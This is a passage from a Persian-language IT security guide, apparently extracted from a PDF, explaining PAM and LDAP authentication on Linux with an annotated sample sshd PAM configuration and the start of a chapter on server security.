‫ﻛﺎﺭﺑﺮ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﺪ ﻭ ﺍﻃﻼﻋـﺎﺕ ﺩﻳﮕـﺮﻱ ﺍﺯ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﻩ ﺭﺍ ﻣﻨﺘـﺸﺮ ﻧﻤـﻲﻧﻤﺎﻳـﺪ‪ .‬ﺍﮔـﺮ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ‪ LDAP‬ﺷـﻤﺎ ﺍﺯ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ‬
‫ﻲ ﺍﺿـﺎﻓﻪ‬‫‪ nis.schema‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪ ،‬ﺍﺿﺎﻓﻪ ﻛﺮﺩﻥ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ‪ LDAP‬ﺑﻪ ﻳﻚ ﺳﺮﻭﻳﺲ ﻛﻨﺘﺮﻝﺷﺪﻩ ﺑﻮﺳـﻴﻠﺔ ‪ ،PAM‬ﺑـﻪ ﺳـﺎﺩﮔ ﹺ‬
‫ﻛﺮﺩﻥ ﻳﻚ ﺧﻂ ﺑﻪ ﻓﺎﻳﻞ ﭘﻴﻜﺮﺑﻨﺪﻱ ‪ PAM‬ﺁﻥ ﺍﺳﺖ‪ ،‬ﻛﻪ ‪ pam_ldap.so‬ﺭﺍ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‪ ،‬ﺍﺭﺯﻳﺎﺑﻲ ﺍﻋﺘﺒﺎﺭ ﺣـﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ‪ ،‬ﻭ‬
‫ﺗﻐﻴﻴﺮ ﺭﻣﺰ ﻋﺒﻮﺭ‪ ،‬ﺑﻌﻨﻮﺍﻥ "ﻛﺎﻓﻲ" ﻣﺸﺨﺺ ﻛﻨﺪ‪.‬‬

‫ﻣﺎﺟﻮﻝﻫﺎﻱ ﻗﺎﺑﻞ ﺍﺗﺼﺎﻝ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ‬


‫ﺑﻪ ﺍﻳﻦ ﻋﻠﺖ ﻛﻪ ﺭﻭﺷﻬﺎﻱ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﺎﺭﺑﺮﺍﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ ،‬ﺑﻬﺘﺮ ﺍﺳﺖ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻳﻚ ﺷﻴﻮﺓ ﻳﻜﺘﺎ ﺩﺍﺷﺘﻪ‬
‫‪١٨٨‬‬
‫ﺑﺎﺷﻴﻢ ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﭼﻨﺪ ﺳﻴﺴﺘﻢ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺭﺍ ﺑﺮﺍﻱ ﻧﻴﺎﺯﻫﺎﻱ ﻣﺘﻔﺎﻭﺕ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ‪ .‬ﺳﻴﺴﺘﻢ ﻣﺎﺟﻮﻟﻬﺎﻱ ﻗﺎﺑﻞ ﺍﺗﺼﺎﻝ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ‬
‫)‪ (PAMs‬ﻳﻚ ﺭﻭﺵ ﺍﻳﻨﭽﻨﻴﻨﻲ ﺍﺳﺖ‪ PAM .‬ﺩﺭ ﺍﺑﺘﺪﺍ ﺑﻮﺳﻴﻠﺔ ‪ SUN‬ﺗﻮﺳﻌﻪ ﻳﺎﻓﺖ ﻭ ﭘﻴﺎﺩﻩﺳﺎﺯﻳﻬﺎﻱ ﺁﻥ ﺑﺮﺍﻱ ‪ ،Free BSD ،Solaris‬ﻭ‬
‫ﺑﺨﺼﻮﺹ ‪ Linux‬ﺑﻴﺸﺘﺮﻳﻦ ‪PAM‬ﻫﺎﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻫﺴﺘﻨﺪ‪ PAM .‬ﻳﻚ ﻛﺘﺎﺑﺨﺎﻧﻪ ﻭ ﻳﻚ ﻭﺍﺳﻂ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ ﻛﻪ ﻫﺮ ﺑﺮﻧﺎﻣﺔ‬
‫ﻛﺎﺭﺑﺮﺩﻱ ﺑﺠﺎﻱ ﺳﻴﺴﺘﻢ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻣﺨﺼﻮﺹ ﺑﻪ ﺧﻮﺩ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪ .‬ﻫﺮ ﺳﻴـﺴﺘﻢ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻛـﻪ ‪ PAM‬ﺁﻧـﺮﺍ‬
‫ﻣﻲﺷﻨﺎﺳﺪ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻣﺎﺟﻮﻝ ‪ PAM‬ﻭ ﺩﺭ ﻋﻤﻞ ﺑﺼﻮﺭﺕ ﻳﻚ ﻛﺘﺎﺑﺨﺎﻧﺔ ﻣﺸﺘﺮﮎ ‪ -‬ﻛﻪ ﺑﺼﻮﺭﺕ ﺩﻳﻨﺎﻣﻴﻜﻲ ﺑﺎﺭﮔﺬﺍﺭﻱﺷﺪﻩ ‪ -‬ﭘﻴﺎﺩﻩﺳـﺎﺯﻱ‬
‫ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﻣﺎﺟﻮﻟﻬﺎﻱ ‪ PAM‬ﺍﺯ ﻃﺮﻕ ﺯﻳﺮ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﺎﺭﺑﺮﺍﻥ ﺩﺭ ﺩﺳﺘﺮﺱ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ‪:‬‬
‫• ﻓﺎﻳﻠﻬﺎﻱ ‪ etc/passwd‬ﻳﺎ ‪etc/shadow‬؛‬
‫• ‪ NIS‬ﻳﺎ ‪NIS+‬؛‬

‫)‪185 Application Programming Interface (API‬‬


‫‪186 Name Service Switch‬‬
‫‪ ۱۸۷‬ﺑﺮﺍﻱ ﺟﺰﺋﻴﺎﺕ ﺑﻴﺸﺘﺮ ﺩﺭ ﻣﻮﺭﺩ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ libnss-ldap‬ﺑﻪ ﺻﻔﺤﺎﺕ ‪ ۴۵۰‬ﺗﺎ ‪ ۴۵۳‬ﮐﺘﺎﺏ ‪ PUIS‬ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪.‬‬
‫‪188 Pluggable Authentication Modules‬‬
‫‪٣٤٥‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫‪LDAP‬؛‬ ‫•‬
‫‪ Kerberos 4‬ﻳﺎ ‪Kerberos 5‬؛ ﻭ‬ ‫•‬
‫‪١٨٩‬‬
‫ﻳﻚ ﻓﺎﻳﻞ ﺩﻟﺨﻮﺍﻩ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ ‪.Berkeley‬‬ ‫•‬

‫ﻫﺮ ﺳﺮﻭﻳﺲ ﺁﺷﻨﺎ ﺑﺎ ‪ PAM‬ﻳﺎ ﺩﺭ ﻓﺎﻳﻞ ‪ /etc/pam.conf‬ﻭ ﻳﺎ ﺑﺼﻮﺭﺕ ﻣﻌﻤﻮﻝﺗﺮ ﺩﺭ ﻓﺎﻳﻞ ﺧﻮﺩﺵ ﺩﺭ ﻣﺴﻴﺮ ‪ /etc/pam.d‬ﭘﻴﻜﺮﺑﻨـﺪﻱ‬
‫ﻣﻲﺷﻮﺩ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ‪ ،‬ﻓﺎﻳﻞ ﭘﻴﻜﺮﺑﻨﺪﻱ ‪ PAM‬ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ ssh‬ﺩﺭ ﻧﺴﺨﻪﻫﺎﻱ ‪ ،Linux‬ﻓﺎﻳـﻞ ‪ /etc/pam.d/sshd‬ﺍﺳـﺖ‪.‬‬
‫ﻳﻚ ﺳﺮﻭﻳﺲ ﺑﻨﺎﻡ "‪ "other‬ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﭘﻴﺶﻓﺮﺿﻬﺎ ﺑﻪ ﺧﺪﻣﺎﺕ ﺁﺷﻨﺎ ﺑﺎ ‪ PAM‬ﻛﻪ ﺻﺮﺍﺣﺘﹰﺎ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻧﺸﺪﻩﺍﻧﺪ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪ .‬ﺫﻳـ ﹰ‬
‫ﻼ ﻣﺜـﺎﻟﻲ‬
‫ﺍﺯ ﻳﻚ ﻓﺎﻳﻞ ﭘﻴﻜﺮﺑﻨﺪﻱ ‪ PAM‬ﺑﺮﺍﻱ ‪ sshd‬ﺭﻭﻱ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ Linux‬ﺁﻣﺪﻩ ﺍﺳﺖ‪:‬‬

‫‪auth required /lib/security/pam_env.so‬‬


‫‪auth sufficient /lib/security/pam_unix.so‬‬
‫‪auth required /lib/security/pam_deny.so‬‬

‫‪account required /lib/security/pam_unix.so‬‬


‫‪password required /lib/security/pam_cracklib.so retry=3‬‬
‫‪password sufficient /lib/security/pam_unix.so nullok use_authtok md5 shadow‬‬
‫‪password required /lib/security/pam_deny.so‬‬

‫‪session required /lib/security/pam_limits.so‬‬


‫‪session required /lib/security/pam_unix.so‬‬
‫ﺧﻄﻮﻁ "‪ "auth‬ﺭﻭﺍﻝ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺭﺍ ﺑﺮﺍﻱ ﺍﻳﻦ ﺳﺮﻭﻳﺲ ﺗﻌﺮﻳﻒ ﻣﻲﻛﻨﺪ‪ ،‬ﻛﻪ ﺑﻪ ﺗﺮﺗﻴ ﹺ‬
‫ﺐ ﺩﺍﺩﻩﺷﺪﻩ ﺩﻧﺒﺎﻝ ﻣﻲﺷـﻮﺩ‪ .‬ﻣﺎﺟﻮﻟﻬـﺎﻳﻲ ﻛـﻪ ﺑـﺎ‬
‫"‪) "required‬ﻻﺯﻡ( ﻣﺸﺨﺺ ﺷﺪﻩﺍﻧﺪ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺍﺟﺮﺍ ﺷﻮﻧﺪ ‪ -‬ﻭ ﺍﮔﺮ ﺩﺭ ﺍﺟﺮﺍ ﺩﭼﺎﺭ ﻣﺸﻜﻞ ﺷﻮﻧﺪ‪ ،‬ﻛﺎﺭﺑﺮ ﺑﺼﻮﺭﺕ ﺗـﺼﺪﻳﻖ‬
‫ﻫﻮﻳﺖ ﻧﺸﺪﻩ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﺩ ﻭ ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﺍﻭ ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲﮔﺮﺩﺩ‪ .‬ﻣﻲﺗﻮﺍﻥ ﻣﺎﺟﻮﻟﻬﺎﻱ "‪ "required‬ﺭﺍ ﺑﺼﻮﺭﺕ ﭼﻨﺪﮔﺎﻧـﻪ ﺗﻌﺮﻳـﻒ‬
‫ﻛﺮﺩ ﻛﻪ ﺩﺭ ﺁﻧﺼﻮﺭﺕ ﻛﻠﻴﺔ ﻣﺎﺟﻮﻟﻬﺎ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺍﺟﺮﺍ ﺷﻮﻧﺪ‪ .‬ﻣﺎﺟﻮﻟﻬﺎﻳﻲ ﻛـﻪ ﺑـﺎ "‪) "sufficient‬ﻛـﺎﻓﻲ( ﻣـﺸﺨﺺ ﺷـﺪﻩﺍﻧـﺪ‪،‬‬
‫ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺍﺟﺮﺍﻳﺸﺎﻥ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺑﺎﺷﺪ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﺎﺭﺑﺮ ﻛﺎﻓﻲ ﻫﺴﺘﻨﺪ ﻭ ﺭﻭﺍﻝ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺭﺍ ﺧﺎﺗﻤﻪ ﻣﻲﺩﻫﻨﺪ‪.‬‬
‫ﺩﺭ ﺍﻳــﻦ ﻣﺜــﺎﻝ ﺍﻭﻟــﻴﻦ ﻣــﺎﺟﻮﻟﻲ ﻛــﻪ ﺍﺟــﺮﺍ ﻣــﻲﺷــﻮﺩ ‪ pam_env‬ﺍﺳــﺖ ﻛــﻪ ﺑــﺼﻮﺭﺕ ﺍﺧﺘﻴــﺎﺭﻱ ﻣﺘﻐﻴﺮﻫــﺎﻱ ﻣﺤﻴﻄــﻲ ﺭﺍ ﺩﺭ‬
‫‪ /etc/security/pam_env.conf‬ﺗﻌﻴﻴ ﹺ‬
‫ﻦ ﻣﻘﺪﺍﺭ ﻳﺎ ﭘﺎﻙ ﻣﻲﻛﻨﺪ‪ .‬ﺍﻳﻦ ﻣﺎﺟﻮﻝ "ﻻﺯﻡ" ﺍﺳﺖ ‪ -‬ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺍﺟﺮﺍ ﺷـﻮﺩ ﺗـﺎ‬
‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﻪ ﺍﻧﺠﺎﻡ ﺑﺮﺳﺪ‪ .‬ﻣﺎﺟﻮﻝ ﺍﺟﺮﺍ ﺷﻮﻧﺪﺓ ﺑﻌﺪﻱ ‪ pam_unix‬ﺍﺳﺖ ﻛﻪ ﺑـﺎ ﻓﺎﻳﻠﻬـﺎﻱ ﺭﻣـﺰ ﻋﺒـﻮﺭ ‪ /etc/passwd - Unix‬ﻭ‬
‫‪ - etc/shadow‬ﻋﻤﻠﻴﺎﺕ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺭﺍ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﺪ‪ .‬ﺍﮔﺮ ﺍﻳﻦ ﻋﻤﻠﻴﺎﺕ ﺑﺎ ﻣﻮﻓﻘﻴﺖ ﺍﻧﺠﺎﻡ ﺷﻮﺩ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛـﺎﺭﺑﺮ ﻛـﺎﻓﻲ‬
‫ﺍﺳﺖ ﻭ ﺭﻭﺍﻝ ﻛﺎﻣﻞ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺁﺧﺮﻳﻦ ﻣﺎﺟﻮﻝ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ‪ pam_deny‬ﺍﺳﺖ ﻛﻪ ﻓﻘﻂ ﺑﻪ ﺷﻜﺴﺖ ﻣﻲﺍﻧﺠﺎﻣﺪ ﺗﺎ ﺑـﻪ ﺭﻭﺍﻝ ﺗـﺼﺪﻳﻖ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻫﻮﻳﺖ ﻧﺎﻣﻮﻓﻖ ﭘﺎﻳﺎﻥ ﺩﻫﺪ‪.‬‬


‫ﺍﻳﻦ ﻓﺎﻳﻞ ﺧﺎﺹ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻫﻤﭽﻨﻴﻦ ﻫﻤﺔ ﻗﻮﺍﻧﻴﻦ ﺳﻴﺴﺘﻢ ﻣﺒﻨﻲ ﺑﺮ ﻣﺴﻦ ﻳﺎ ﻣﻨﻘﻀﻲ ﺷﺪﻥ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺭﺍ ﺍﻋﻤﺎﻝ ﻣﻲﻛﻨﺪ‪ ،‬ﻭ ﺑـﺮﺍﻱ‬
‫ﻣﻨﺎﺑﻊ ﺩﺭ ﻧﺸﺴﺖ ‪ sshd‬ﻛﺎﺭﺑﺮ ﻣﺤﺪﻭﺩﻳﺘﻬﺎﻳﻲ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ‪ .‬ﺍﮔﺮ ‪ sshd‬ﻗﺎﺑﻠﻴﺖ ﺗﻐﻴﻴﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﻧﻴﺰ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﺍﻳﻦ ﻓﺎﻳـﻞ ﭘﻴﻜﺮﺑﻨـﺪﻱ ﺍﺯ‬
‫ﺗﻐﻴﻴﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮ ﺑﻪ ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﻪ ﺑﻪ ﺁﺳﺎﻧﻲ ﻗﺎﺑﻞ ﺣﺪﺱ ﺯﺩﻥ ﺑﺎﺷـﺪ ﻧﻴـﺰ ﺟﻠـﻮﮔﻴﺮﻱ ﻣـﻲﻛﻨـﺪ‪ ،‬ﻭ ﺭﻣﺰﻫـﺎﻱ ﻋﺒـﻮﺭ ﺭﺍ ﺩﺭ‬
‫‪ /etc/shadow‬ﺑﺼﻮﺭﺕ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺑﻮﺳﻴﻠﺔ ﺗﺎﺑﻊ ﺭﻣﺰﻧﮕﺎﺭﻱ ‪ MD5‬ﺫﺧﻴﺮﻩ ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬
‫ﺯﻳﺮﺳﻴﺴﺘﻢ ‪ PAM‬ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﭼﻨﺪ ﺻﻮﺭﺕ ﻣﺨﺘﻠﻒ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﻮﺩ‪ .‬ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﻌﻀﻲ ﺍﺯ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ‬
‫ﺭﺍ ﻣﻠﺰﻡ ﺑﻪ ﺩﻭ ﻳﺎ ﺳﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺟﺪﺍﮔﺎﻧﻪ ﻛﺮﺩ‪ ١٩٠،‬ﻳﻚ ﺭﻭﺵ ﺑﻴﻮﻣﺘﺮﻳﻚ ﺭﺍ ﺑﺎ ﻳﻚ ﻋﺒﺎﺭﺕ ﺭﻣﺰﻱ ﺗﺮﻛﻴﺐ ﻧﻤﻮﺩ‪ ،‬ﻭ ﻳﺎ ﺑـﺮ ﺍﺳـﺎﺱ ﺯﻣـﺎﻥ ﺭﻭﺯ‬

‫‪ ۱۸۹‬ﺍﮔﺮ ﺍﻳﻦ ﻻﻳﻪﻫﺎ ﺑﺮﺍﻱ ﺷﻤﺎ ﻛﺎﻓﻲ ﻧﻴﺴﺘﻨﺪ‪ ،‬ﺑﻌﻀﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻣﺜﻞ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ‪ SMTP‬ﺩﺭ ‪ Sendmail‬ﻳﺎ ﻣﺪﻳﺮﻳﺖ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﺻـﻨﺪﻭﻗﻬﺎﻱ ﭘـﺴﺘﻲ‬
‫‪simple authentication and‬‬ ‫ﺑﻮﺳﻴﻠﺔ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ ،Cyrus imapd‬ﺍﺯ ﻛﺘﺎﺑﺨﺎﻧﺔ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ‪) Cyrus SASL‬ﻻﻳـﺔ ﺳـﺎﺩﺓ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻭ ﺍﻣﻨﻴـﺖ‪،‬‬
‫‪ (security layer‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺑﺎ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﻣﺠﺰﺍ ﻭ ﻳﺎ ﺍﺯ ﻃﺮﻳﻖ ‪ PAM‬ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﻨﺪ! ﻏﻴﺮﻗﺎﺑﻞ ﺗﺼﻮﺭ ﻧﻴﺴﺖ ﻛﻪ ﺷـﻤﺎ ﺑـﺮﺍﻱ‬
‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﺗﺼﺎﻝ ‪ imap‬ﻳﻚ ﻛﺎﺭﺑﺮ ﺑﺨﻮﺍﻫﻴﺪ ﺍﺯ ‪ SASL‬ﻣﺒﺘﻨﻲ ﺑﺮ ‪ PAM‬ﻣﺒﺘﻨﻲ ﺑﺮ ‪ LDAP‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٤٦‬‬

‫ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﺭﺍ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭﺁﻭﺭﺩ‪ .‬ﺍﺯ ﻃﺮﻑ ﺩﻳﮕﺮ ﺩﺭ ﻣﻮﻗﻌﻴﺘﻬﺎﻱ ﻓﻴﺰﻳﻜﻲ ﺑﺴﻴﺎﺭ ﺍﻳﻤﻦ ﺣﺘﻲ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺭﻣﺰ ﻋﺒﻮﺭ ﻧﻴﺰ ﺻﺮﻓﻨﻈﺮ ﻛﺮﺩ‪.‬‬
‫‪ PAM‬ﺑﻪ ﺭﺍﻫﺒﺮ ﺗﻮﺍﻧﺎﻳﻲ ﺍﻧﺘﺨﺎﺏ ﺳﻴﺎﺳﺖ ﺩﻟﺨﻮﺍﻩ ﺭﺍ ﻣﻲﺩﻫﺪ ﺗﺎ ﺑﺘﻮﺍﻧﺪ ﺑﻪ ﺑﻬﺘﺮﻳﻦ ﻧﺤﻮ‪ ،‬ﻣﺨﺎﻃﺮﻩ ﻭ ﻓﻨﺎﻭﺭﻱ ﻣﻮﺟﻮﺩ ﺭﺍ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ ﺗﻄﺒﻴـﻖ‬
‫ﺩﻫﺪ‪.‬‬
‫‪ - PAM‬ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﻣﺜﺎﻟﻬﺎﻱ ﺑﺎﻻ ﺭﻭﺷﻦ ﻛﺮﺩﻧﺪ ‪ -‬ﻣﻲﺗﻮﺍﻧﺪ ﻛﺎﺭﻫﺎﻳﻲ ﺑﺴﻴﺎﺭ ﺑﻴﺶ ﺍﺯ ﺻﺮﻓﹰﺎ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﻧﺠﺎﻡ ﺩﻫـﺪ‪ .‬ﻳﻜـﻲ ﺍﺯ ﻧﻘـﺎﻁ‬
‫ﻗﻮﺕ ﺁﻥ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﻪ ﺭﻭﺷﻨﻲ ﭼﻬﺎﺭ ﻓﺎﺯ ﻭ ﺭﻭﺍﻝ ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﺍﺯ ﻳﻜﺪﻳﮕﺮ ﺟﺪﺍ ﻣﻲﻛﻨﺪ‪ :‬ﺍﺭﺯﻳﺎﺑﻲ ﺍﻳﻨﻜﻪ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﺍﺟـﺎﺯﺓ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﺳﺮﻭﻳﺲ ﻣﻮﺭﺩ ﻧﻈﺮ‪ ،‬ﺩﺭ ﺯﻣﺎﻥ ﻣﻮﺭﺩ ﻧﻈﺮ‪ ،‬ﻭ ﺍﺯ ﻣﻮﻗﻌﻴـﺖ ﻣـﻮﺭﺩ ﻧﻈـﺮ ﺭﺍ ﺩﺍﺭﺩ )ﻓـﺎﺯ ﺣـﺴﺎﺏ ﻛـﺎﺭﺑﺮﻱ(‪ ،‬ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻛـﺎﺭﺑﺮ )ﻓـﺎﺯ ﺗـﺼﺪﻳﻖ(‪،‬‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻭ ﺳﺎﻳﺮ ﻧﺸﺎﻧﻬﺎﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﺭ ﺯﻣﺎﻧﻴﻜﻪ ﺍﻳﻨﻜﺎﺭ ﻻﺯﻡ ﺑﺎﺷﺪ )ﻓﺎﺯ ﺭﻣﺰ ﻋﺒﻮﺭ(‪ ،‬ﻭ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ ﻭ ﺍﺯ ﻛـﺎﺭ ﺍﻧـﺪﺍﺧﺘﻦ‬
‫ﻧﺸﺴﺖ ﻛﺎﺭﺑﺮ )ﻓﺎﺯ ﻧﺸﺴﺖ( ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺷﺎﻣﻞ ﻣﺤﺪﻭﺩ ﻛﺮﺩﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻣﻨﺎﺑﻊ ﻭ ﺍﻳﺠﺎﺩ ﺩﻧﺒﺎﻟﻪﻫﺎﻱ ﻣﻤﻴﺰﻱ ﻫﻢ ﺑﺎﺷﺪ‪.‬‬

‫‪ ۱۹۰‬ﺯﻣﺎﻧﻴﻜﻪ ﻛﺎﺭﺑﺮ ﻫﻤﺔ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺭﺩ ﺍﻳﻦ ﻳﻚ ﻣﺴﺌﻠﻪ ﻗﺎﺑﻞ ﺑﺤﺚ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺭﻭﺵ ﺯﻣﺎﻧﻴﻜﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺘﻔﺎﻭﺕ ﺗﺨﺼﻴﺺ ﻳﺎﻓﺘﻪﺍﻧﺪ ﻣﻲﺗﻮﺍﻧﺪ‬
‫ﻣﻔﻴﺪ ﺑﺎﺷﺪ‪ ،‬ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﻫﺮ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺑﻪ ﺩﻭ ﻧﻔﺮ ﻳﺎ ﺑﻴﺸﺘﺮ ﻧﻴﺎﺯ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﻳﻚ ﺩﻧﺒﺎﻟﻪ "ﺷﺎﻫﺪ ﺑﻮﺩﻥ" ﺭﺍ ﺍﻳﺠﺎﺩ ﻛﻨﺪ‪.‬‬
‫‪٣٤٧‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻓﺼﻞ ﺷﺸﻢ‬
‫ﺍﻣﻨﻴﺖ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ‬
‫ﻛﻠﻴﺎﺕ‬
‫ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﺑـﺼﻮﺭﺕ ﻋـﺎﻡ‪ ،‬ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺍﺳـﺖ ﻛـﻪ ﻣﻴﺰﺑـﺎﻧﻲ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ ﻣﺨﺘﻠـﻒ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﺭﺍ ﺑـﺮ ﻋﻬـﺪﻩ ﺩﺍﺭﺩ ﻭ ﺍﻳـﻦ‬
